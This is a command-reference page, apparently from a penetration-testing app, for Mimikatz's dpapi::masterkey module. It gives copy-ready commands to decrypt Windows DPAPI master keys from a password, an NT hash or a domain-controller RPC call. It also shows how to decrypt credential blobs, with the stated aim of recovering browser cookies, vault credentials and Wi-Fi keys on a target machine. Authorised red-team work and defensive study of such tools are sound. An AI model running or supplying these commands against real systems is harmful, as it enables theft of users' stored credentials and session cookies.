Mimikatz dpapi::masterkey

Decrypt a DPAPI master key using the owner's plaintext password (or NT hash). Required step before decrypting Chrome/Edge cookies, vault credentials, and Wi-Fi PSKs. Use /rpc on a DC for trustee decryption without the password.

Tool
mimikatz.exe
Category
Credential Attacks / Hash Dumping
Platform
windows
Requires
shell access

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

mimikatz.exe "dpapi::masterkey /in:<masterkey-file> /sid:<user-sid> /password:<user-password>" exit

Credential variants

The same attack using a different authentication material.

DC RPC Decrypt (DA) requires shell access

mimikatz.exe "dpapi::masterkey /in:<masterkey-file> /rpc" exit

Decrypt Credential Blob requires shell access

mimikatz.exe "dpapi::cred /in:<credential-file> /masterkey:<decrypted-mk>" exit

Examples

mimikatz.exe "dpapi::masterkey /in:C:\Users\jdoe\AppData\Roaming\Microsoft\Protect\<sid>\<guid> /sid:S-1-5-21-... /password:Password123!" exit

Tags

mimikatz dpapi masterkey